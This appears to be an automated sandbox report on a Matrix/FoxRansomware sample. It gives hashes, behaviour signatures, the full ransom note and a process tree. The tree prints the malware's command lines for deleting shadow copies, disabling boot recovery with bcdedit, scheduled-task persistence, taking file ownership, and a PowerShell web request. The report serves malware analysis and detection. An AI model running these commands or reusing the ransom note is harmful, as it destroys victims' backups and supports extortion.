Overview

overview

10

Static

static

3

FoxRansomw...65.exe

windows7-x64

10

FoxRansomw...65.exe

windows10-2004-x64

10

FoxRansomw...a7.exe

windows7-x64

10

FoxRansomw...a7.exe

windows10-2004-x64

10

FoxRansomw...20.exe

windows7-x64

10

FoxRansomw...20.exe

windows10-2004-x64

10

FoxRansomw...0b.exe

windows7-x64

10

FoxRansomw...0b.exe

windows10-2004-x64

10

FoxRansomw...53.exe

windows7-x64

10

FoxRansomw...53.exe

windows10-2004-x64

10

FoxRansomw...b1.exe

windows7-x64

10

FoxRansomw...b1.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    03-04-2024 17:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe

  • Size

    1.2MB

  • MD5

    907636b28d162f7110b067a8178fa38c

  • SHA1

    048ae4691fe267e7c8d9eda5361663593747142a

  • SHA256

    6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

  • SHA512

    501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

  • SSDEEP

    24576:R/SA+2lraRrjSJR5ezmT1dM9tZBb5t+wb8fq/81mkvfW:3XlayIsy81hvf

Score
10/10
matrixdiscoveryevasionpersistenceransomwareupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://myexternalip.com/raw

Extracted

Path

C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\#CORE_README#.rtf

Ransom Note
{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}} {\colortbl ;\red255\green0\blue0;\red0\green77\blue187;\red0\green176\blue80;\red0\green0\blue255;\red255\green255\blue255;} {\*\generator Riched20 10.0.15063}\viewkind4\uc1 \pard\ri-500\sa200\sl240\slmult1\qc\tx8804\ul\b\f0\fs28\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\ulnone\f1\lang1049\par \pard\ri-74\sl240\slmult1\tx8378\cf1\f0\fs24\lang1033 ATENTION!!!\par \cf0\b0 We are realy sorry to inform you that \b ALL YOUR FILES WERE ENCRYPTED \par \b0 by our automatic software. It became possible because of bad server security. \par \cf1\b ATENTION!!!\par \cf0\b0 Please don't worry, we can help you to \b RESTORE\b0 your server to original\par state and decrypt all your files quickly and safely!\par \b\par \cf2 INFORMATION!!!\par \cf0\b0 Files are not broken!!!\par Files were encrypted with AES-128+RSA-2048 crypto algorithms.\par There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \b DELETED AFTER 7 DAYS! \b0 You will irrevocably lose all your data!\par \i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\par * Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\f1\lang1049\par \i0\f0\lang1033\par \cf3\b HOW TO RECOVER FILES???\par \cf0\b0 Please write us to the e-mail \i (write on English or use professional translator)\i0 :\par \pard\sl240\slmult1\b\fs28 [email protected]\par [email protected]\par [email protected]\cf1\fs24\par You have to send your message on each of our 3 emails\f1\lang1049 \f0\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\fs28\par \pard\ri-74\sl240\slmult1\tx8378\cf0\b0\fs24 \par In subject line write your personal ID:\par \b\fs28 1D4DCBC40EDCDA61\par \b0\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \f1\lang1049\par \i * \f0\lang1033 \f1\lang1049 \f0\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \par \i0\par \cf1\b OUR ADVICE!!!\par \cf0\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\par \ul\b\par We will definitely reach an agreement ;) !!!\b0\par \ulnone\par \fs20 \par \par \par \par \par \par \par \pard\ri-74\sl240\slmult1\qc\tx8378\b\fs24 ALTERNATIVE COMMUNICATION\par \b0\fs20\par \pard\ri-74\sl240\slmult1\tx8378 \f1\lang1049 If y\'eeu did n\'eet r\'e5c\'e5iv\'e5 th\'e5 \'e0nsw\'e5r fr\'eem th\'e5 \'e0f\'eer\'e5cit\'e5d \'e5m\'e0il\f0\lang1033 s\f1\lang1049 f\'eer m\'eer\'e5 th\f0\lang1033 e\f1\lang1049 n \f0\lang1033 24\f1\lang1049 h\f0\lang1033 o\f1\lang1049 urs\f0\lang1033 please s\f1\lang1049\'e5\f0\lang1033 nd us Bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 s fr\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r thr\f1\lang1049\'ee\f0\lang1033 ugh th\f1\lang1049\'e5\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 bp\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 {{\field{\*\fldinst{HYPERLINK https://bitmsg.me }}{\fldrslt{https://bitmsg.me\ul0\cf0}}}}\f0\fs20 . B\f1\lang1049\'e5\f0\lang1033 l\f1\lang1049\'ee\f0\lang1033 w is \f1\lang1049\'e0\f0\lang1033 tut\f1\lang1049\'ee\f0\lang1033 ri\f1\lang1049\'e0\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 n h\f1\lang1049\'ee\f0\lang1033 w t\f1\lang1049\'ee\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nd bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 vi\f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r:\par 1. \f1\lang1049\'ce\f0\lang1033 p\f1\lang1049\'e5\f0\lang1033 n in y\f1\lang1049\'ee\f0\lang1033 ur br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r th\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\fldrslt{https://bitmsg.me/users/sign_up\ul0\cf0}}}}\f0\fs20 \f1\lang1049\'e0\f0\lang1033 nd m\f1\lang1049\'e0\f0\lang1033 k\f1\lang1049\'e5\f0\lang1033 th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n b\f1\lang1049\'f3\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 ring n\f1\lang1049\'e0\f0\lang1033 m\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd.\par 2. \f1\lang1049\'d3\'ee\f0\lang1033 u must c\f1\lang1049\'ee\f0\lang1033 nfirm th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n, r\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd f\f1\lang1049\'ee\f0\lang1033 ll\f1\lang1049\'ee\f0\lang1033 w th\f1\lang1049\'e5\f0\lang1033 instructi\f1\lang1049\'ee\f0\lang1033 ns th\f1\lang1049\'e0\f0\lang1033 t w\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nt t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 u.\par 3. R\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 sit\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e0\f0\lang1033 nd \f1\lang1049\'f1\f0\lang1033 lick \f1\lang1049 "\f0\lang1033 L\f1\lang1049\'ee\f0\lang1033 gin\f1\lang1049 "\f0\lang1033 l\f1\lang1049\'e0\f0\lang1033 b\f1\lang1049\'e5\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 r us\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\fldrslt{https://bitmsg.me/users/sign_in\ul0\cf0}}}}\f0\fs20 , \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd \f1\lang1049\'e0\f0\lang1033 nd click th\f1\lang1049\'e5\f0\lang1033 "Sign in" butt\f1\lang1049\'ee\f0\lang1033 n. \f1\lang1049 \f0\lang1033\par 4. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "\f1\lang1049\'d1\f0\lang1033 r\f1\lang1049\'e5\'e0\f0\lang1033 t\f1\lang1049\'e5\f0\lang1033 R\f1\lang1049\'e0\f0\lang1033 nd\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss" butt\f1\lang1049\'ee\f0\lang1033 n.\par 5. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "N\f1\lang1049\'e5\f0\lang1033 w m\f1\lang1049\'e0\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\par \b 6. S\f1\lang1049\'e5\f0\lang1033 nding m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 :\par T\f1\lang1049\'ee\f0\lang1033 :\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss: \b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\par \pard\sl240\slmult1 Subj\f1\lang1049\'e5\'f1\f0\lang1033 t:\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur ID: \b 1D4DCBC40EDCDA61\par M\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 : \b0 D\f1\lang1049\'e5\f0\lang1033 scrib\f1\lang1049\'e5\f0\lang1033 wh\f1\lang1049\'e0\f0\lang1033 t \f1\lang1049\'f3\'ee\f0\lang1033 u think n\f1\lang1049\'e5\f0\lang1033 c\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 r\f1\lang1049\'f3\f0\lang1033 .\par \pard\ri-74\sa200\sl240\slmult1\tx8378\f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "S\f1\lang1049\'e5\f0\lang1033 nd m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\cf5\b\par \pard\sa200\sl240\slmult1\fs28 IQ5Ipo73\cf0\f1\fs32\lang1049\par \par }
Emails
URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Signatures

  • Matrix Ransomware 64 IoCs

    Targeted ransomware with information collection and encryption functionality.

    ransomwarematrix
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
    ransomwareevasion
  • Blocklisted process makes network request 1 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 4 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Enumerates connected drives 3 TTPs 44 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 47 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
    "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe"
    1⤵
    • Matrix Ransomware
    • Loads dropped DLL
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:2956
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWwSQgCp.exe"
      2⤵
        PID:3024
      • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWwSQgCp.exe
        "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWwSQgCp.exe" -n
        2⤵
        • Executes dropped EXE
        PID:2620
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xDmEPljO.txt"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:816
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1196
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\DjD57Lbc.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2164
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\DjD57Lbc.bmp" /f
          3⤵
          • Sets desktop wallpaper using registry
          PID:2192
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
          3⤵
            PID:2292
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
            3⤵
            • Matrix Ransomware
            PID:1328
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\S4Bfhqiw.vbs"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1076
          • C:\Windows\SysWOW64\wscript.exe
            wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\S4Bfhqiw.vbs"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:848
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\wOZ34oRR.bat" /sc minute /mo 5 /RL HIGHEST /F
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1940
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\wOZ34oRR.bat" /sc minute /mo 5 /RL HIGHEST /F
                5⤵
                • Creates scheduled task(s)
                PID:1396
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
              4⤵
                PID:2412
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /Run /I /tn DSHCA
                  5⤵
                    PID:2968
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vvdIy2ke.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2396
              • C:\Windows\SysWOW64\attrib.exe
                attrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
                3⤵
                • Views/modifies file attributes
                PID:2620
              • C:\Windows\SysWOW64\cacls.exe
                cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C
                3⤵
                  PID:2696
                • C:\Windows\SysWOW64\takeown.exe
                  takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
                  3⤵
                  • Modifies file permissions
                  PID:1628
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c siPyPOvN.exe -accepteula "StandardBusiness.pdf" -nobanner
                  3⤵
                  • Loads dropped DLL
                  PID:2684
                  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\siPyPOvN.exe
                    siPyPOvN.exe -accepteula "StandardBusiness.pdf" -nobanner
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:3008
                    • C:\Users\Admin\AppData\Local\Temp\siPyPOvN64.exe
                      siPyPOvN.exe -accepteula "StandardBusiness.pdf" -nobanner
                      5⤵
                      • Drops file in Drivers directory
                      • Sets service image path in registry
                      • Executes dropped EXE
                      • Enumerates connected drives
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: LoadsDriver
                      • Suspicious use of AdjustPrivilegeToken
                      PID:400
            • C:\Windows\system32\taskeng.exe
              taskeng.exe {C331B2FD-1A46-4EA4-913B-687BD51A8ED0} S-1-5-21-406356229-2805545415-1236085040-1000:IKJSPGIM\Admin:Interactive:[1]
              1⤵
                PID:2208
                • C:\Windows\SYSTEM32\cmd.exe
                  C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\wOZ34oRR.bat"
                  2⤵
                    PID:2480
                    • C:\Windows\system32\vssadmin.exe
                      vssadmin Delete Shadows /All /Quiet
                      3⤵
                      • Interacts with shadow copies
                      PID:1596
                    • C:\Windows\System32\Wbem\WMIC.exe
                      wmic SHADOWCOPY DELETE
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4720
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}
                      3⤵
                      • Drops file in System32 directory
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4836
                      • C:\Windows\system32\vssadmin.exe
                        "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
                        4⤵
                        • Interacts with shadow copies
                        PID:4936
                    • C:\Windows\system32\bcdedit.exe
                      bcdedit /set {default} recoveryenabled No
                      3⤵
                      • Modifies boot configuration data using bcdedit
                      PID:4956
                    • C:\Windows\system32\bcdedit.exe
                      bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      3⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2452
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN DSHCA /F
                      3⤵
                        PID:1912
                  • C:\Windows\system32\vssvc.exe
                    C:\Windows\system32\vssvc.exe
                    1⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3352

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\#CORE_README#.rtf
                    Filesize

                    8KB

                    MD5

                    c78a812b37244fdba4738d13aef001cd

                    SHA1

                    083187f95aff0c19f2ee6325978109adc6284800

                    SHA256

                    e2e45c829aa25b74a95a2f62f6787a606167a3d86e731b13b28badae383631ae

                    SHA512

                    34299fc9aa1d017f53f0dcf3386669651d390fc87be144ba0eb40ff72204bdae1d41403ef23e736a0b74c2bfa6a16f054f37a0006661fe91dbaff1f613b741e7

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\elog_1D4DCBC40EDCDA61.txt
                    Filesize

                    54KB

                    MD5

                    663c777e56512a9ac65e8b83a3319853

                    SHA1

                    79864c5827cc00b84407be199224e596b5d1f98c

                    SHA256

                    d57ec49134e62064f77c5e58310746f7f182791d00d7787a01dc8e5121b3a8f4

                    SHA512

                    61834dc95216f36c46c041c4770316d20adce9fcfeaba433a5aeb7592a8da61eb19071f6c35be2cbb6ab5047d58f1e8875ed5fcc918f193b8651731bca2c1f15

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\siPyPOvN.exe
                    Filesize

                    181KB

                    MD5

                    2f5b509929165fc13ceab9393c3b911d

                    SHA1

                    b016316132a6a277c5d8a4d7f3d6e2c769984052

                    SHA256

                    0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

                    SHA512

                    c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vvdIy2ke.bat
                    Filesize

                    246B

                    MD5

                    03d4331a2fb2e8d93b43d92cb80c08e6

                    SHA1

                    a4bc676e908ab495d0f93267c2c55ff0bcf54110

                    SHA256

                    a5bcd32243a5535ed075a02a2ead333c9fa83f2aaf91507993c8f7cd79873a42

                    SHA512

                    3d7bd0692a4e1b6af282a40f0a130b303f54093043a971f086ca5db2f59b546dbed4f25b56793c235a6460ca33ff7dc71e3099ace31aad1da0512ab4bb037f2f

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xDmEPljO.txt
                    Filesize

                    16B

                    MD5

                    17d432845dc7cb55ac69d75cf72f7f5d

                    SHA1

                    7f3b6e6ab91b3a13c0611fe6e95befab691d5cc3

                    SHA256

                    a7cd0523e7aca4fd8db39d49ce1fe6198b92956509bd360dae646798c2a251a4

                    SHA512

                    25054cd4ec03675f28d0aa1aa09b691beacb9f9a1cf538179777d74a713e97457c39d56c787becc378fcdc31c62cbdf56546f8cee41f5f99f11b8798663104e0

                    Download Submit

                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2F3ZDOEROF46SOGSYIED.temp
                    Filesize

                    7KB

                    MD5

                    7fe2564e6c6df34b62af0561dd120e74

                    SHA1

                    83d02273db5e63b68fc77b3b8cbc34a0d57064b4

                    SHA256

                    5b5423faf0cd8535bdce9304109a9f2db38955d44a02607caaddb5d8f76b4072

                    SHA512

                    a3d3ee85ad093eb50ca74fb2307ce1fdd9ddfa7b8976420bfe7c17cf174aee892ce451bab39a154a9f005c95ad670c701ef06c621558dc54433e0fd45132603b

                    Download Submit

                  • C:\Users\Admin\AppData\Roaming\S4Bfhqiw.vbs
                    Filesize

                    260B

                    MD5

                    a65a07b2771a54a0735feaaed024ef53

                    SHA1

                    8a49732c332448824605f95183f15b73d9d0f022

                    SHA256

                    2089ead2fdc3d518e658a21595fad4146ed8ebfec393c1a9b5fca128f280727a

                    SHA512

                    96bfe06b713a69efeb440edbb4300fb2e2e333a9e6259098a1d59ba04ab0dc8e2c21be5f27747750c9fbcdac43c50d5013b303a46a20d0cb72f16a8c27abf0af

                    Download Submit

                  • C:\Users\Admin\AppData\Roaming\wOZ34oRR.bat
                    Filesize

                    415B

                    MD5

                    19ffd75c0310f1d123f4efa9b932022a

                    SHA1

                    c9ff4bee62ebd1db2d13476954ef77141a5c9c45

                    SHA256

                    1aa27aeafaf80320e2029ddd3beb14d6f34911cd48d81850ed6f2c6f9eac7191

                    SHA512

                    c08f18bab7c2d36ccc9f55f9303deeae5a37750bf722c7c81b91fa9f12b1965d1964c79079fa6e8a6e3261e1f0e58ce03eb2b54f8fdf75311d207b12145c063a

                    Download Submit

                  • \Users\Admin\AppData\Local\Temp\FoxRansomware\NWwSQgCp.exe
                    Filesize

                    1.2MB

                    MD5

                    907636b28d162f7110b067a8178fa38c

                    SHA1

                    048ae4691fe267e7c8d9eda5361663593747142a

                    SHA256

                    6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

                    SHA512

                    501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

                    Download Submit

                  • \Users\Admin\AppData\Local\Temp\siPyPOvN64.exe
                    Filesize

                    221KB

                    MD5

                    3026bc2448763d5a9862d864b97288ff

                    SHA1

                    7d93a18713ece2e7b93e453739ffd7ad0c646e9e

                    SHA256

                    7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

                    SHA512

                    d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

                    Download Submit

                  • memory/1196-12-0x0000000073B90000-0x000000007413B000-memory.dmp

                    Filesize

                    5.7MB

                    Download

                  • memory/1196-13-0x0000000002650000-0x0000000002690000-memory.dmp

                    Filesize

                    256KB

                    Download

                  • memory/1196-11-0x0000000073B90000-0x000000007413B000-memory.dmp

                    Filesize

                    5.7MB

                    Download

                  • memory/1196-16-0x0000000073B90000-0x000000007413B000-memory.dmp

                    Filesize

                    5.7MB

                    Download

                  • memory/1196-14-0x0000000002650000-0x0000000002690000-memory.dmp

                    Filesize

                    256KB

                    Download

                  • memory/2620-8-0x0000000000400000-0x000000000053B000-memory.dmp

                    Filesize

                    1.2MB

                    Download

                  • memory/2684-14059-0x0000000000230000-0x00000000002A7000-memory.dmp

                    Filesize

                    476KB

                    Download

                  • memory/2684-2237-0x0000000000230000-0x00000000002A7000-memory.dmp

                    Filesize

                    476KB

                    Download

                  • memory/2956-15-0x0000000000400000-0x000000000053B000-memory.dmp

                    Filesize

                    1.2MB

                    Download

                  • memory/2956-8701-0x0000000000400000-0x000000000053B000-memory.dmp

                    Filesize

                    1.2MB

                    Download

                  • memory/2956-14056-0x0000000000400000-0x000000000053B000-memory.dmp

                    Filesize

                    1.2MB

                    Download

                  • memory/2956-12272-0x0000000000400000-0x000000000053B000-memory.dmp

                    Filesize

                    1.2MB

                    Download

                  • memory/2956-14724-0x0000000000400000-0x000000000053B000-memory.dmp

                    Filesize

                    1.2MB

                    Download

                  • memory/2956-14795-0x0000000000400000-0x000000000053B000-memory.dmp

                    Filesize

                    1.2MB

                    Download

                  • memory/3008-2307-0x0000000000400000-0x0000000000477000-memory.dmp

                    Filesize

                    476KB

                    Download

                  • memory/4836-14741-0x000007FEF5070000-0x000007FEF5A0D000-memory.dmp

                    Filesize

                    9.6MB

                    Download

                  • memory/4836-14742-0x00000000027F0000-0x0000000002870000-memory.dmp

                    Filesize

                    512KB

                    Download

